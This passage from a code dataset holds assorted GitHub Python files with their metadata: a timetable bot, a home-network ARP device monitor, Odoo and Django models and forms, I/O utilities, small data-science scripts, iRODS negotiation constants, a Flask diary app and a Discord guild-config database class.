requests.get(DOWNLOAD_LINK)\n with BytesIO(responce.content) as bytes_table:\n # Unnamed:0 - index, we don`t need it\n return pd.io.excel.read_excel(bytes_table).drop(\"Unnamed: 0\", axis=1)\n\n def get_cached_table(CACHED_TABLE_PATH, CACHED_TABLE_NAME):\n return pd.read_excel(f\"{CACHED_TABLE_PATH}/{CACHED_TABLE_NAME}\")\n\n def save_cache(table, CACHED_TABLE_PATH, CACHED_TABLE_NAME):\n table.to_excel(f\"{CACHED_TABLE_PATH}/{CACHED_TABLE_NAME}\", index=False)\n\n table = False\n download_failure = False\n if DOWNLOAD_LINK:\n try:\n table = download_table(DOWNLOAD_LINK)\n except Exception:\n download_failure = True\n\n if CACHED_TABLE_PATH and CACHED_TABLE_NAME or download_failure:\n table = get_cached_table(CACHED_TABLE_PATH, CACHED_TABLE_NAME)\n\n else:\n table = False\n\n if table.shape[0] and CACHED_TABLE_PATH and CACHED_TABLE_NAME:\n save_cache(table, CACHED_TABLE_PATH, 
CACHED_TABLE_NAME)\n\n return table\n\n\ndef split_table(table, target_group):\n global dow\n global sf_pairs\n\n def get_start_group_point(table, target_group):\n\n column1 = list(table[table.columns.values[0]].values)\n row_index = column1.index(\"Группа\")\n column_index = list(table.iloc[row_index, :].values).index(target_group)\n\n return column_index, row_index\n\n def clean_df_table(table):\n return table.dropna()\n\n column_index, row_index = get_start_group_point(table, target_group)\n\n # 12*6 - pairs per day * working days\n # +2 - useless rows\n # +4 - pair_name, type_of_pair, teacher, classroom\n target_table = table.iloc[\n row_index + 2 : row_index + 2 + 12 * 6, column_index : column_index + 4\n ].reset_index(drop=True)\n\n new_pair_types = target_table[target_table.columns.values[1]].apply(\n lambda x: x if x != \"пр\" else \"сем\"\n )\n\n target_table[target_table.columns.values[1]] = new_pair_types\n\n target_table_odd = pd.concat(\n (\n pd.Series(np.array(list(map(lambda x: [x] * 6, dow))).reshape(1, -1)[0]),\n pd.Series(sf_pairs * 6),\n target_table.iloc[::2].reset_index(drop=True),\n ),\n axis=1,\n )\n\n target_table_even = pd.concat(\n (\n pd.Series(np.array(list(map(lambda x: [x] * 6, dow))).reshape(1, -1)[0]),\n pd.Series(sf_pairs * 6),\n target_table.iloc[1::2].reset_index(drop=True),\n ),\n axis=1,\n )\n\n return (\n clean_df_table(target_table_odd),\n clean_df_table(target_table_even),\n )\n\n\ndef daily_table_text(table, target_group):\n global sf_pairs\n global dow\n global start_date\n global today_dow\n\n def make_dow_table_text(table):\n today_dow = dow[datetime.today().weekday()]\n\n today_table = table[table[table.columns.values[0]] == today_dow].reset_index(\n drop=True\n )\n\n s = \"\"\n times_arr = []\n for row in today_table[today_table.columns.values[1:]].to_records():\n times_arr.append(row[1])\n s += f\"{sf_pairs.index(row[1]) + 1} ({row[1]})\\n\"\n s += f\" {(row[2])}\\n\"\n s += f\" {row[3]} {row[5]}\\n\"\n s += f\" {row[4]}\\n\\n\"\n s = s[:-1]\n\n return s, times_arr\n\n current_week = datetime.now().isocalendar()[1]\n start_week = datetime.strptime(start_date, \"%d.%m.%Y\").isocalendar()[1]\n\n if current_week > 16:\n raise ValueError\n\n odd_week = (current_week - start_week) % 2 == 1\n today_list = list(datetime.now().date().timetuple())[:3][::-1]\n times_arr = []\n\n s = target_group + \"\\n\"\n s += f'Сегодня {\".\".join(str(el) for el in today_list)} '\n s += f\"({today_dow})\\n\"\n s += \"Нечетная\" if odd_week else \"Четная\"\n s += f\" неделя ({current_week - start_week})\\n\\n\"\n\n if odd_week:\n s_, times_arr = make_dow_table_text(split_table(table, target_group)[0])\n\n s += s_\n\n else:\n s_, times_arr = make_dow_table_text(split_table(table, target_group)[1])\n\n s += s_\n\n pair_start = times_arr[0].split(\"-\")[0]\n pair_stop = times_arr[-1].split(\"-\")[-1]\n\n s += f\"\\nС {pair_start} до {pair_stop}\"\n\n return s\n\n\ndef weekly_table_text(table, target_group):\n global sf_pairs\n global dow\n global start_date\n global today_dow\n\n current_week = datetime.now().isocalendar()[1]\n start_week = datetime.strptime(start_date, \"%d.%m.%Y\").isocalendar()[1]\n\n odd_week = (current_week - start_week) % 2 == 1\n today_list = list(datetime.now().date().timetuple())[:3][::-1]\n\n # if current_week > 16:\n\n # s = \"\"\n # s += \"\\nА учебы больше нет)))\\n\\n\\n\"\n # s += \" * Я из прошлого надеюсь, \\n что у тебя все круто\\n\\n\"\n\n # return s\n\n s = target_group + \"\\n\"\n s += f'Сегодня {\".\".join(str(el) for el in 
today_list)} '\n s += f\"({today_dow})\\n\"\n s += \"Нечетная\" if odd_week else \"Четная\"\n s += f\" неделя ({current_week - start_week})\\n\\n\"\n\n tab = split_table(table, target_group)[0 if odd_week else 1]\n\n for i, day_of_week in enumerate(dow):\n dow_table = tab[tab[tab.columns.values[0]] == day_of_week]\n\n if dow_table.shape[0] == 0:\n continue\n\n pair_time = dow_table[tab.columns.values[1]].values\n pair_number = list(map(lambda x: sf_pairs.index(x) + 1, pair_time))\n pair_name = dow_table[tab.columns.values[2]].values\n\n s += day_of_week + \"\\n\"\n\n for i, cur_pair_number in enumerate(pair_number):\n s += f\" {cur_pair_number} : {pair_name[i]}\\n\"\n\n s += \"\\n\"\n\n s += \"Удивительное количество пар !!!\\n\"\n s += f\"Целых {tab.shape[0]} всего за неделю\"\n\n return s\n\n\ndef genegate_timetable_text(\n target_group,\n CACHED_TABLE_PATH: str = None,\n CACHED_TABLE_NAME: str = None,\n DOWNLOAD_LINK: str = None,\n):\n\n table = get_table(\n CACHED_TABLE_PATH=CACHED_TABLE_PATH,\n CACHED_TABLE_NAME=CACHED_TABLE_NAME,\n DOWNLOAD_LINK=DOWNLOAD_LINK,\n )\n\n global today_dow\n\n if today_dow == \"Вс\" or True:\n return weekly_table_text(table, target_group)\n\n else:\n return daily_table_text(table, target_group)\n\n\ndef make_timetable_image_buff(SCRIPT_PATH: str, target_group, CURRENT_CONFIG):\n\n REL_FONT_PATH = CURRENT_CONFIG[\"FONT_PATH\"]\n REL_IMAGE_PATH = CURRENT_CONFIG[\"REL_IMAGE_PATH\"]\n CACHED_TABLE_PATH = CURRENT_CONFIG[\"CACHED_TABLE_PATH\"]\n CACHED_TABLE_NAME = CURRENT_CONFIG[\"CACHED_TABLE_NAME\"]\n\n DOWNLOAD_LINK = CURRENT_CONFIG[\"DOWNLOAD_LINK\"][\"FULL_LINK_PATH\"]\n\n def pick_background_image_path(SCRIPT_PATH, REL_IMAGE_PATH):\n\n random_image_filename = random.choice(\n os.listdir(f\"{SCRIPT_PATH}/{REL_IMAGE_PATH}\")\n )\n\n background_image_path = f\"{SCRIPT_PATH}/img/images/{random_image_filename}\"\n\n return background_image_path\n\n table_text = genegate_timetable_text(\n CACHED_TABLE_PATH=CACHED_TABLE_PATH,\n CACHED_TABLE_NAME=CACHED_TABLE_NAME,\n target_group=target_group,\n DOWNLOAD_LINK=DOWNLOAD_LINK,\n )\n\n text_image = TextImage(\n timetable_text=table_text,\n rel_font_path=REL_FONT_PATH,\n SCRIPT_PATH=SCRIPT_PATH,\n background_image_path=pick_background_image_path(SCRIPT_PATH, REL_IMAGE_PATH),\n )\n\n img = text_image.make_timetable_image()\n\n buff = BytesIO()\n img.save(buff, format=\"PNG\")\n\n return buff.getvalue()\n","repo_name":"alex7186/timetable_bot","sub_path":"back/table_manager.py","file_name":"table_manager.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24833136159","text":"import scapy.all as scapy\nimport time\nimport subprocess\nimport ipaddress\n\nNETWORK = \"192.168.1.0/24\"\nINTERVAL = 30 # seconds\nmapping = {\n '11:22:22:33:44:55': 'John Mobile',\n '66:77:88:99:11:22': 'Eric PC',\n '33:44:55:66:77:88': 'Bob Mobile'\n}\n\n\ndef scan(ip):\n # Use a set object to store the MAC addresses of the devices\n macs = set()\n\n # Create an ARP request packet\n arp_request = scapy.ARP(pdst=ip)\n\n # Create an Ethernet packet with a broadcast destination MAC address\n broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')\n\n # Combine the Ethernet and ARP request packets\n arp_request_broadcast = broadcast/arp_request\n\n # Send the packet and get the response\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]\n\n # Iterate over the hosts in the response\n for host in answered_list:\n # Check if 
the host's IP address is not the default gateway\n if host[1].psrc != \"192.168.1.1\":\n # Add the host's MAC address to the set of MAC addresses\n macs.add(host[1].src)\n\n # Return the set of MAC addresses\n return macs\n\n\ndef connection_change(hosts, action):\n # Validate the action\n if action not in (\"connected\", \"disconnected\"):\n raise ValueError(f\"Invalid action: {action}\")\n\n # Iterate over the hosts in the set\n for host in hosts:\n # Check if the host's MAC address is in the mapping\n if host in mapping:\n device = mapping[host] # Get the device name\n else:\n device = 'unknown device' # Use a default name\n\n # Create the command to run\n if action == 'connected':\n cmd = [\"echo\", f\"{device} connected\", \"|\", \"cscript\", \"C:\\\\Progra~1\\\\Jampal\\\\ptts.vbs\"]\n else:\n cmd = [\"echo\", f\"{device} disconnected\", \"|\", \"cscript\", \"C:\\\\Progra~1\\\\Jampal\\\\ptts.vbs\"]\n\n # Run the command\n subprocess.run(cmd, stdout=None, stderr=None)\n\n\ndef main():\n # Parse and validate the network IP address and subnet mask\n network = ipaddress.ip_network(NETWORK, strict=False)\n\n # Scan the network for devices\n old_macs = scan(network)\n\n # Announce that the devices are connected\n connection_change(old_macs, \"connected\")\n\n # Loop indefinitely\n while True:\n # Sleep for the specified interval\n time.sleep(INTERVAL)\n\n # Scan the network for devices\n macs = scan(network)\n\n # Calculate the set of new devices\n new = macs\n","repo_name":"Ahmed-Z/who_is_on_my_wifi","sub_path":"who_is_on_my_wifi.py","file_name":"who_is_on_my_wifi.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"30510488679","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError, UserError\n\n\nclass OrganizationCategory(models.Model):\n _name = 'ss_erp.organization.category'\n _description = 'Organization category'\n\n name = fields.Char(string='Category name')\n company_id = fields.Many2one(\n 'res.company', string='Company', required=True,\n readonly=True, default=lambda self: self.env.company)\n sequence = fields.Integer(\"Sequence\")\n active = fields.Boolean(\n default=True, help=\"If the active field is set to False, it will allow you to hide the payment terms without removing it.\")\n hierarchy_number = fields.Integer(\"Hierarchy\")\n organization_count = fields.Integer(\n string=\"Organization Count\", compute=\"_compute_organization_count\",\n compute_sudo=True\n )\n organization_ids = fields.One2many(\n \"ss_erp.organization\", \"organization_category_id\", string=\"Organizations\")\n\n _sql_constraints = [\n (\"name_uniq\", \"UNIQUE(name)\", \"Organization Category Name Should Be Unique!\")\n ]\n\n @api.depends(\"organization_ids\")\n def _compute_organization_count(self):\n for record in self:\n record.organization_count = len(record.organization_ids)\n\n def action_view_organizations(self):\n organization_ids = self.organization_ids\n action = self.env.ref('ss_erp_master.action_organizations')\n result = action.read()[0]\n result[\"context\"] = {}\n organization_count = len(organization_ids)\n if organization_count != 1:\n result[\"domain\"] = \"[('organization_category_id', 'in', \" + \\\n str(self.ids) + \")]\"\n return result\n res = self.env.ref('ss_erp_master.organization_view_form', False)\n result[\"views\"] = [(res and res.id or False, \"form\")]\n result[\"res_id\"] = organization_ids.id\n return 
result\n\n def unlink(self):\n for record in self:\n if self.env['ss_erp.organization'].search([('organization_category_id', '=', record.id)]):\n raise UserError(\n _('You can not delete organization category as other records still reference it. However, you can archive it.'))\n return super(OrganizationCategory, self).unlink()\n","repo_name":"tu95ctv/sgvn","sub_path":"ss_erp_master/models/organization_category.py","file_name":"organization_category.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21601587969","text":"import imp\nfrom typing import Text\nfrom .models import Articl, Comments\nfrom django.forms import ModelForm, TextInput, Textarea, DateTimeInput\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import get_user_model\n\n\nclass ArticlForm(ModelForm):\n class Meta:\n model = Articl\n fields = ['title' , 'info' , 'full_text' , 'data']\n\n widgets = {\n \"title\" : TextInput(attrs={\n 'class': 'text-add' ,\n 'placeholder' : 'Название вакансии' \n }),\n \"info\" : TextInput(attrs={\n 'class': 'text-add' ,\n 'placeholder' : 'Зарплата' \n }),\n \"full_text\" : Textarea(attrs={\n 'class': 'text-add' ,\n 'placeholder' : 'Полная информация по вакансии' \n }),\n \"data\" : DateTimeInput(attrs={\n 'class': 'text-add',\n 'placeholder' : 'Дата публикации',\n 'type' : 'date'\n })\n }\n\nUser = get_user_model()\n\nclass UserCreationForm(UserCreationForm):\n\n class Meta(UserCreationForm.Meta):\n model = User\n\nclass CommentForm(ModelForm):\n class Meta:\n model = Comments\n fields = ['text',]\n\n widgets = {\n \"text\" : Textarea(attrs={\n 'class': 'form__text' ,\n 'placeholder' : 'Впишите отзыв'\n })\n }\n","repo_name":"WindFallten/Kursach","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1174021182","text":"import json\nimport os\nimport pickle\nimport re\nfrom pathlib import Path\nfrom typing import Any, DefaultDict, Iterable, List, Optional, OrderedDict\n\nimport numpy as np\nimport torch\n\nfrom rex.utils.deprecation import deprecation_warning\nfrom rex.utils.logging import logger\n\n\ndef tensor_friendly_json_encoding(obj: Any):\n if isinstance(obj, DefaultDict) or isinstance(obj, OrderedDict):\n obj = dict(obj)\n elif isinstance(obj, set):\n obj = list(obj)\n elif isinstance(obj, np.ndarray):\n obj = obj.tolist()\n elif isinstance(obj, np.generic):\n obj = obj.item()\n elif isinstance(obj, torch.Tensor):\n if len(obj.shape) == 0:\n # scalar\n obj = obj.item()\n else:\n obj = obj.tolist()\n return obj\n\n\ndef dump_json(obj, filepath, **kwargs):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n json.dump(\n obj,\n fout,\n ensure_ascii=False,\n default=tensor_friendly_json_encoding,\n **kwargs,\n )\n\n\ndef load_json(filepath, **kwargs):\n data = list()\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n data = json.load(fin, **kwargs)\n return data\n\n\ndef dump_line_json(obj, filepath, **kwargs):\n deprecation_warning(\"dump_line_json\", \"dump_jsonlines\")\n return dump_jsonlines(obj, filepath, **kwargs)\n\n\ndef dump_jsonlines(obj, filepath, **kwargs):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n for d in obj:\n line_d = json.dumps(\n d, ensure_ascii=False, default=tensor_friendly_json_encoding, **kwargs\n )\n fout.write(\"{}\\n\".format(line_d))\n\n\ndef 
load_line_json(filepath, **kwargs):\n deprecation_warning(\"load_line_json\", \"load_jsonlines\")\n return load_jsonlines(filepath, **kwargs)\n\n\ndef load_jsonlines(filepath, **kwargs):\n data = list()\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n for line in fin:\n line_data = json.loads(line.strip())\n data.append(line_data)\n return data\n\n\ndef dump_pickle(obj, filepath, **kwargs):\n with open(filepath, \"wb\") as fout:\n pickle.dump(obj, fout, **kwargs)\n\n\ndef load_pickle(filepath, **kwargs):\n data = None\n with open(filepath, \"rb\") as fin:\n data = pickle.load(fin, **kwargs)\n return data\n\n\ndef dump_csv(obj: Iterable[Any], filepath: str, delimiter: Optional[str] = \"\\t\"):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n for d in obj:\n line_d = delimiter.join(d)\n fout.write(\"{}\\n\".format(line_d))\n\n\ndef load_csv(\n filepath: str,\n title_row: bool,\n title_keys: Optional[List[str]] = None,\n sep: Optional[str] = \"\\t\",\n) -> List:\n \"\"\"load csv file\n\n Args:\n filepath: filepath to load\n title_row: has title in the first row or not?\n If true, it'll return a list of dict where keys are from\n the title, otherwise a list of str list.\n title_keys: if not `title_row`, you can set the title keys yourself.\n sep: separation char\n \"\"\"\n data = list()\n title_keys = title_keys if title_keys else []\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n for idx, line in enumerate(fin):\n line_data = line.strip().split(sep)\n if title_row and idx == 0:\n title_keys = line_data\n continue\n if title_keys:\n if len(title_keys) != len(line_data):\n raise RuntimeError(\n f\"len of title keys: {title_keys}\"\n f\" does not match the line data in line {idx + 1}\"\n f\" in file: {filepath}\"\n )\n ins = {}\n for col, key in zip(line_data, title_keys):\n ins[key] = col\n else:\n ins = line_data\n data.append(ins)\n return data\n\n\ndef load_embedding_file(filepath, encoding=\"utf-8\", open_func=open, verbose=False):\n tokens = []\n token2vec = {}\n num_tokens = -1\n dim_emb = 0\n with open_func(filepath, \"rt\", encoding=encoding) as fin:\n for line_no, line in enumerate(fin):\n line = line.split()\n if line_no == 0:\n if len(line) == 2 and all(x.isdigit() for x in line):\n num_tokens = int(line[0])\n dim_emb = int(line[1])\n else:\n dim_emb = len(line) - 1\n tokens.append(line[0])\n token2vec[line[0]] = list(map(float, line[1:]))\n continue\n # dimension checking\n if len(line) - 1 != dim_emb:\n continue\n tokens.append(line[0])\n token2vec[line[0]] = list(map(float, line[1:]))\n\n if num_tokens > 0 and num_tokens != len(tokens):\n logger.warning(\n f\"emb file info num of tokens: {num_tokens}, while {len(tokens)} tokens are found\"\n )\n\n if verbose:\n logger.info(f\"Loading #Tokens: {len(tokens)}, Emb dim: {dim_emb}\")\n\n return tokens, token2vec\n\n\ndef load_line_iterator(filepath):\n with open(filepath, \"rt\", encoding=\"utf-8\") as fin:\n for line in fin:\n yield line\n\n\ndef load_line_json_iterator(filepath, **kwargs):\n deprecation_warning(\"load_line_json_iterator\", \"load_jsonlines_iterator\")\n return load_jsonlines_iterator(filepath, **kwargs)\n\n\ndef load_jsonlines_iterator(filepath):\n for line in load_line_iterator(filepath):\n yield json.loads(line)\n\n\ndef dump_iterable(obj: Iterable, filepath: str):\n with open(filepath, \"wt\", encoding=\"utf-8\") as fout:\n for line in obj:\n fout.write(f\"{line}\\n\")\n\n\ndef split_filepath(filepath: str) -> tuple:\n \"\"\"Split filepath into folder path, filename, prefix and 
suffix\"\"\"\n path = Path(filepath)\n folder = str(path.absolute().parent)\n filename = path.name\n suffix = path.suffix\n prefix = filename.removesuffix(suffix)\n return folder, filename, prefix, suffix\n\n\ndef find_files(regex: str, folder: str, recursive: bool = True) -> List[str]:\n \"\"\"Find files with regex in a folder\"\"\"\n regex = re.compile(regex, flags=re.DOTALL)\n files = []\n for root, _, filenames in os.walk(folder):\n for filename in filenames:\n if regex.match(filename):\n files.append(os.path.join(root, filename))\n if not recursive:\n break\n return files\n","repo_name":"Spico197/REx","sub_path":"rex/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"} +{"seq_id":"16829920791","text":"import winsound, time\nprint(\"Okay, atempting to print the terminal bell.\")\ninput()\nprint(\"\\a\")\nprint(\"Now doing a winsound beep.\")\ninput()\nwinsound.Beep(1000,1000)\nprint(\"Okay, now doing a thing where we go through a loop and beep.\")\nfor x in range(2000):\n\tif x<37: continue\n\twinsound.Beep(x,200)\n\tx=x+49\n","repo_name":"braillescreen/PythonBeep","sub_path":"BeepPython.py","file_name":"BeepPython.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26155489140","text":"import matplotlib.pyplot as plt\nfrom sklearn.datasets import load_digits\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sn\nimport numpy as np\n\n# data preprocessing\ndigits = load_digits()\n\nX_train , X_test , y_train , y_test = train_test_split(digits.data , digits.target , test_size=0.2)\nprint(X_train.shape , X_test.shape)\n\n# model training\n\nmodel = LogisticRegression(max_iter=10000)\nmodel.fit(X_train,y_train)\n\n# results\n\nprint(model.score(X_test,y_test))\n\n# generate random numbers and test\n\nnp.random.seed(np.random.randint(0,100))\nrandom_numbers = np.random.randint(0, 1797, size=5)\n\npredictions_array , target_array = [] , []\nfor number in random_numbers:\n target_array.append(digits.target[number])\n predictions_array.append(model.predict([digits.data[number]]))\n\nprint('Actual : ' , target_array , 'Predictions : ' , np.array(predictions_array).flatten())\n\n# see the faliure\n\ny_predicted = model.predict(X_test)\ncm = confusion_matrix(y_test,y_predicted)\nplt.figure(figsize=(10,7))\nsn.heatmap(cm,annot=True)\nplt.xlabel('Predicted')\nplt.xlabel('Truth')\n\nplt.show()","repo_name":"Alexis-Papazoglou/ML_Roadmap","sub_path":"v8 - Multiclass Logistic Regression/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19239520570","text":"# https://packaging.python.org/guides/distributing-packages-using-setuptools/\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n# with open(\"requirements.txt\", \"r\") as fh:\n# requirements = [line.strip() for line in fh]\n\nwith open(\"VERSION\", \"r\") as fh:\n version = fh.readline()\n\nsetuptools.setup(\n name=\"mdtocf\",\n version=version,\n author=\"Olaf Reitmaier Veracierta\",\n author_email=\"olafrv@gmail.com\",\n description=\"Markdown files/directory publishing to Atlassian Confluence\",\n 
long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/olafrv/mdtocf\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n # install_requires=requirements,\n)\n","repo_name":"olafrv/mdtocf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"23661638467","text":"import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nsns.set(style=\"darkgrid\",\n\trc = {'figure.figsize':(11.7,8.27)})\n\npublishers = pd.read_csv(\"publishers.csv\")\n\ng = sns.boxplot(x = \"genre\", y = \"sale price\", data = publishers,\n\t\t\t\tpalette = \"Set1\")\nplt.title(\"Boxplot of Amazon E-books Sale Price by Genre\")\n\ng.axes.set_title(\"Boxplot of Amazon E-books Sale Price by Genre\\n\",fontsize=25)\ng.set_xlabel(\"\\nGenre\",fontsize=20)\ng.set_ylabel(\"Sale Price\\n\",fontsize=20)\n\n\ng.figure.savefig(\"boxplot.png\")\nplt.show()","repo_name":"dongchris/data-visualization","sub_path":"seaborn_amazon_ebooks/code/boxplot_sales_price_genre.py","file_name":"boxplot_sales_price_genre.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74113766439","text":"\n# https://github.com/irods/irods/blob/4.2.1/lib/core/include/irods_client_server_negotiation.hpp\n# https://github.com/irods/irods/blob/4.2.1/lib/core/src/irods_client_negotiation.cpp\n\n# Token sent to the server to request negotiation\nREQUEST_NEGOTIATION = \"request_server_negotiation\"\n\n# Negotiation request values\nREQUIRE_SSL = \"CS_NEG_REQUIRE\"\nREQUIRE_TCP = \"CS_NEG_REFUSE\"\n\n# Negotiation result (response) values\nFAILURE = \"CS_NEG_FAILURE\"\nUSE_SSL = \"CS_NEG_USE_SSL\"\nUSE_TCP = \"CS_NEG_USE_TCP\"\n\n# Keywords\nCS_NEG_SID_KW = \"cs_neg_sid_kw\"\nCS_NEG_RESULT_KW = \"cs_neg_result_kw\"\n\n\ndef perform_negotiation(client_policy, server_policy):\n if REQUIRE_SSL in (client_policy, server_policy):\n if REQUIRE_TCP in (client_policy, server_policy):\n return FAILURE, 0\n return USE_SSL, 1\n return USE_TCP, 1\n\n\ndef validate_policy(policy):\n if policy not in (REQUIRE_SSL, REQUIRE_TCP):\n raise ValueError('Invalid client-server negotiation policy: {}'.format(policy))\n","repo_name":"irods/python-irodsclient","sub_path":"irods/client_server_negotiation.py","file_name":"client_server_negotiation.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"18"} +{"seq_id":"15431871393","text":"from flask import Flask,render_template,request,session, redirect, make_response,url_for\nimport psycopg2\nimport psycopg2.extras\nfrom werkzeug.utils import secure_filename\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\napp=Flask(__name__)\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'ufawifyagwer1742yncs2'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://localhost/litalico'\ndb = SQLAlchemy(app)\nmigrate = Migrate(app,db)\n\n# model definitions\nclass User_table(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(20),unique=True)\n\nclass Message_table(db.Model):\n diary_id = 
db.Column(db.Integer,primary_key = True)\n sender_id = db.Column(db.Integer)\n receiver_id = db.Column(db.Integer)\n contents = db.Column(db.String(400))\n attention = db.Column(db.Integer)\n\n# Routing area\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/admin/users\")\ndef show_users():\n all_user = User_table.query.filter(User_table.id >= 2)\n return render_template(\"all_user.html\",all_user = all_user)\n\n@app.route(\"/admin/articles/<int:id>\")\ndef supporter_posting(id):\n if Message_table.query.filter(Message_table.sender_id==2).first():\n from_message = sorted(Message_table.query.filter(Message_table.sender_id==2),key = lambda message:message.diary_id)\n username = \"test\"\n return render_template(\"re_article.html\",username=username,from_message=from_message)\n else:\n return render_template(\"none.html\")\n\n@app.route(\"/posted_page\",methods=[\"POST\"])\ndef post_page():\n id = request.form[\"id\"]\n contents = request.form[\"contents\"]\n sender_id = 2\n receiver_id = 1\n new_article = Message_table(sender_id=sender_id, receiver_id = receiver_id,contents=contents,attention=0)\n db.session.add(new_article)\n db.session.commit()\n return redirect(\"/articles/new#form\")\n\n@app.route(\"/articles/new\")\ndef supported_posting():\n id = 2\n past_message = Message_table.query.filter(Message_table.sender_id == 2)\n return render_template(\"article.html\",id=id,past_message=past_message)\n\n@app.route(\"/attention\",methods=[\"POST\"])\ndef attention():\n diary_id = request.form[\"diary_id\"]\n update_attention = Message_table.query.filter(Message_table.diary_id == diary_id).first()\n update_attention.attention = 1\n db.session.commit()\n return redirect(\"/admin/articles/2#diary-\" + diary_id)\n\n# DB commands\n@app.cli.command(\"initdb\")\ndef initdb_command():\n db.create_all()\n","repo_name":"litalico-si-2018/e_team","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74983777639","text":"from ast import literal_eval\nimport json\nfrom datetime import datetime, timedelta\nimport discord\n\nclass GuildConfigDB:\n def __init__(self, db):\n self.db = db\n\n \n async def check_guild(self, guild_id: int):\n conn = await self.db.get_connection()\n x = await conn.fetch(\"SELECT * FROM guild_config WHERE guild_id=$1\", guild_id)\n await conn.close()\n if len(x) < 1:\n return \"No records of this guild on database\"\n return x[0]\n\n async def get_conf(self, guild_id: int, attr):\n conn = await self.db.get_connection()\n x = await conn.fetchrow(\"SELECT config FROM guild_config WHERE guild_id = $1\", guild_id)\n await conn.close()\n config = literal_eval(x[0])\n try:\n conf_attr = config[attr]\n except KeyError:\n return None\n return conf_attr\n \n async def get_module(self, guild_id: int):\n conn = await self.db.get_connection()\n x = await conn.fetchrow(\"SELECT modules FROM guild_config WHERE guild_id = $1\", guild_id)\n await conn.close()\n modules = literal_eval(x[0])\n return modules\n\n async def add_conf(self, guild_id: int, attr: str, attr_id):\n conn = await self.db.get_connection()\n # fetch the raw config dict; get_conf() returns a single attribute, not the dict\n x = await conn.fetchrow(\"SELECT config FROM guild_config WHERE guild_id = $1\", guild_id)\n configuration = literal_eval(x[0])\n configuration[attr] = attr_id\n await conn.execute(\"UPDATE guild_config SET config = $1 WHERE guild_id = $2\", f\"{configuration}\", guild_id)\n await conn.close()\n\n async def add_guild(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n 
guild_text = {}\n guild_voice = {}\n guild_roles = {}\n for tchan in guild.text_channels:\n guild_text[tchan.name] = tchan.id\n for vchan in guild.voice_channels:\n guild_voice[vchan.name] = vchan.id\n for role in guild.roles:\n guild_roles[role.name] = [role.id, str(role.color)]\n guildtext = json.dumps(guild_text)\n guildvoice = json.dumps(guild_voice)\n del guild_roles[\"@everyone\"]\n guildroles = json.dumps(guild_roles)\n guildconfig = json.dumps({'prefix': 'e!'})\n guildmodules = json.dumps({'ban': True})\n await conn.execute(\"INSERT INTO guild_config(guild_id, guild_name, guild_members, guild_text, guild_voice, guild_roles, \"\n \"config, modules) VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\", guild.id, guild.name, len(guild.members),\n guildtext, guildvoice, guildroles, guildconfig, guildmodules)\n await conn.close()\n\n async def remove_guild(self, guild_id: int):\n conn = await self.db.get_connection()\n await conn.execute(\"DELETE FROM guild_config WHERE guild_id=$1\", guild_id)\n await conn.close()\n \n async def add_bot_removed(self, guild_id):\n conn = await self.db.get_connection()\n expiryDate = datetime.utcnow() + timedelta(days=30)\n await conn.execute(\"UPDATE guild_config SET bot_removed=$1 WHERE guild_id=$2\", str(expiryDate), guild_id)\n await conn.close()\n \n async def remove_bot_removed(self, guild_id):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET bot_removed=$1 